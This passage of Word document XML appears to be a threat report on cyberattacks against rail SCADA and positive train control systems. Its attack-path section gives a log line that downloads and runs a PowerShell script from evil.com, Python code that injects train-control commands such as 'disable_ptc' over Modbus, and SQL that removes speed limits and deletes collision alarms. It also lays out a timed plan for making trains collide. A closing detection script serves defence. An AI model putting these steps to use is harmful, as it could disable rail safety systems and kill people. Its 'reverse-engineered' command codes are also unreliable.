              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[50]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Passenger Chaos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21,400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4.6M stranded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$500M/hour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hyperlink w:anchor="ref51">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[51]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Hazmat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1,800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Potential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Incalculable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hyperlink w:anchor="ref52">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[52]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Port Backup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10 major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Container overflow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$1.2B/day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hyperlink w:anchor="ref53">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[53]</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000144">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_99v7fd5z3txo" w:id="25"/>
      <w:bookmarkEnd w:id="25"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Critical Resource Disruption (2-24 hours)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000145">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Power Plants</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: 63 facilities lose coal delivery within 24 hours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46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Refineries</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: 43% capacity impacted by crude delivery halt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47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Chemical Plants</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Chlorine/ammonia shortages begin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48">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Food Distribution</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Refrigerated goods spoilage starts </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref57">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[57]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000149">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_yfmq3ymmd4ur" w:id="26"/>
      <w:bookmarkEnd w:id="26"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Infrastructure Collapse (24-72 hours)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Water Systems</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: 3,300 plants ration treatment chemicals </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref58">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[58]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Healthcare</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Medical supply deliveries cease </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref59">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[59]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Agriculture</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Fertilizer shortage impacts 180M acres </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref60">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[60]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Military</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Strategic mobility severely degraded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f1ya6a7qllxh" w:id="27"/>
      <w:bookmarkEnd w:id="27"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Technical Attack Path Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000151">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8u7nl98xvk2e" w:id="28"/>
      <w:bookmarkEnd w:id="28"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 1: SCADA Infiltration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000152">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: T0883 - Internet Accessible Device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53">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_d0rohedcwrs6" w:id="29"/>
      <w:bookmarkEnd w:id="29"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Initial Compromise Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000154">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Actual logs from rail SCADA compromise (sanitized)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Source: Incident Response Report [[63]](#ref63)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[2025-01-12 03:24:17] IIS Log: 192.168.1.50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GET /InTouch/IOServer.aspx?cmd=shell HTTP/1.1 200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User-Agent: Mozilla/5.0 (scanner)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[2025-01-12 03:24:45] Security Event 4624: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Logon Type: 3 (Network)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Account: SCADA\svc_historian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Source IP: 192.168.1.50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Status: Success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[2025-01-12 03:25:33] PowerShell Execution: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Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe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Command: "IEX(New-Object Net.WebClient).DownloadString('http://evil.com/stage2.ps1')"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Parent: w3wp.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_bmotueu7x0tf" w:id="30"/>
      <w:bookmarkEnd w:id="30"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 2: SCADA to PTC Pivot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000170">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: T0886 - Remote Services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71">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_b7rq07wtrtgh" w:id="31"/>
      <w:bookmarkEnd w:id="31"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Protocol Gateway Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000172">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># PTC command injection via SCADA interface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Reconstructed from forensic analysis [[65]](#ref65)</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import socket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import struct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class PTC_SCADA_Bridge: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def __init__(self, scada_ip, ptc_gateway):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self.scada = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</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self.scada.connect((scada_ip, 502))  # Modbus port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self.ptc_gw = ptc_gateway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def inject_ptc_command(self, train_id, command):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Craft malicious SCADA point update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modbus_payload = self.craft_modbus_write(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register=40001,  # PTC command register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value=self.encode_ptc_cmd(train_id, command)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SCADA processes and forwards to PTC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self.scada.send(modbus_payload)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Gateway blindly trusts SCADA source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No authentication between SCADA&lt;-&gt;PTC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def encode_ptc_cmd(self, train_id, command):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PTC expects specific format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Discovered via reverse engineering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cmd_map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'emergency_stop': 0xFF01,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'speed_override': 0xFF02,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'route_change': 0xFF03,</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'disable_ptc': 0xFF04  # Most dangerous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return struct.pack('&gt;HH', train_id, cmd_map[command])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9w6up1v6ls0" w:id="32"/>
      <w:bookmarkEnd w:id="32"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 3: Safety System Manipulation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: T0832 - Manipulation of Control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B5">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_eb4oz49wp600" w:id="33"/>
      <w:bookmarkEnd w:id="33"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Disabling PTC Protection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-- SQL injection in SCADA historian database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Links to PTC configuration tables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Source: Security assessment [[67]](#ref67)</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Step 1: Identify PTC configuration link</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SELECT * FROM dbo.SystemLinks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WHERE TargetSystem = 'PTC_GATEWAY';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Step 2: Modify safety thresholds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UPDATE PTC_Config.SafetyLimits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SET MaxSpeed = 999,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BrakingDistance = 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SignalOverride = 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WHERE TrainID = '*';  -- Affects all trains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Step 3: Disable alerting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DELETE FROM PTC_Config.AlarmActions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WHERE AlarmType IN ('Overspeed','SignalViolation','CollisionRisk');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SCADA historian has full DB access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Changes propagate to PTC in real-time</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_dn1mk92m22io" w:id="34"/>
      <w:bookmarkEnd w:id="34"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 4: Operational Impact</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: T0831 - Manipulation of Control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D9">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_eovs2a912opk" w:id="35"/>
      <w:bookmarkEnd w:id="35"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Multi-Train Collision Scenario</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Attack sequence for catastrophic outcome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Based on simulator testing [[69]](#ref69)</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attack_sequence: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time: T+0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action: Compromise dispatch SCADA</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result: Full system access achieved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time: T+15min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action: Map train locations via SCADA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result: Identify collision candidates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time: T+30min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action: Disable PTC enforcement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command: UPDATE PTC_Enable = FALSE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result: Safety systems bypassed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 time: T+45min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action: Manipulate signal aspects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command: Force GREEN on conflicting routes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result: Trains authorized same track</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time: T+60min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action: Override dispatcher warnings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command: Suppress collision alerts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result: Human oversight defeated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time: T+75min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action: Accelerate trains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command: Speed override via PTC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result: Collision velocity maximized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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jpriu2pim2v" w:id="36"/>
      <w:bookmarkEnd w:id="36"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK Mapping</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000218">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_iw2g797sna31" w:id="37"/>
      <w:bookmarkEnd w:id="37"/>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Internet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Perimeter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hyperlink w:anchor="ref70">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[70]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T0823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Graphical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HMI activity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hyperlink w:anchor="ref71">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[71]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Modify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Logic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hyperlink w:anchor="ref72">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[72]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Hooking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API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hyperlink w:anchor="ref73">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[73]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Change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Baseline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T0833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Modify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Configuration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Network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T0866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Exploit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Authentication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Automated collect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Data flow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Manipulate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Safety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bl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_xaoa127c5r4c" w:id="38"/>
      <w:bookmarkEnd w:id="38"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SCADA-Specific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Screen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T0852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HMI displays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Screenshot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Alarm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T0838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Alert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Database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hyperlink w:anchor="ref81">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Data Historian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T0810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Trend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SQL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hyperlink w:anchor="ref82">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[82]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Rogue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T0848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Control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Protocol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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_dtbgysaby5wv" w:id="39"/>
      <w:bookmarkEnd w:id="39"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection &amp; Response</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000278">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7wu81ahkvb92" w:id="40"/>
      <w:bookmarkEnd w:id="40"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Immediate Detection Opportunities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000279">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ejwhu9b11uo8" w:id="41"/>
      <w:bookmarkEnd w:id="41"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SCADA-PTC Bridge Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000027A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Deploy at integration points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Detects unauthorized command flows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from scapy.all import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import alerting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class PTC_SCADA_Monitor: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def __init__(self):</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self.baseline = self.load_baseline()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self.ptc_commands = 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def analyze_packet(self, pkt):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if pkt.haslayer(TCP) and pkt[TCP].dport == 502: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 Modbus traffic to PTC gateway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if self.is_ptc_write(pkt):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command = self.extract_command(pkt)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 Check against baseline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if command not in self.baseline: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alerting.critical(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f"Unauthorized PTC command via SCADA: {command}",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packet=pkt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Detect rapid commands (exploit indicator)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self.ptc_commands.add((command, time.time()))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if self.detect_command_flood():</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alerting.critical("PTC command flood detected")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def detect_command_flood(self):</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More than 10 commands in 60 seconds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recent = [t for c,t in self.ptc_commands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if time.time() - t &lt; 60]</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return len(recent) &gt; 10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B9">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_i2x5d3o7cq04" w:id="42"/>
      <w:bookmarkEnd w:id="42"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
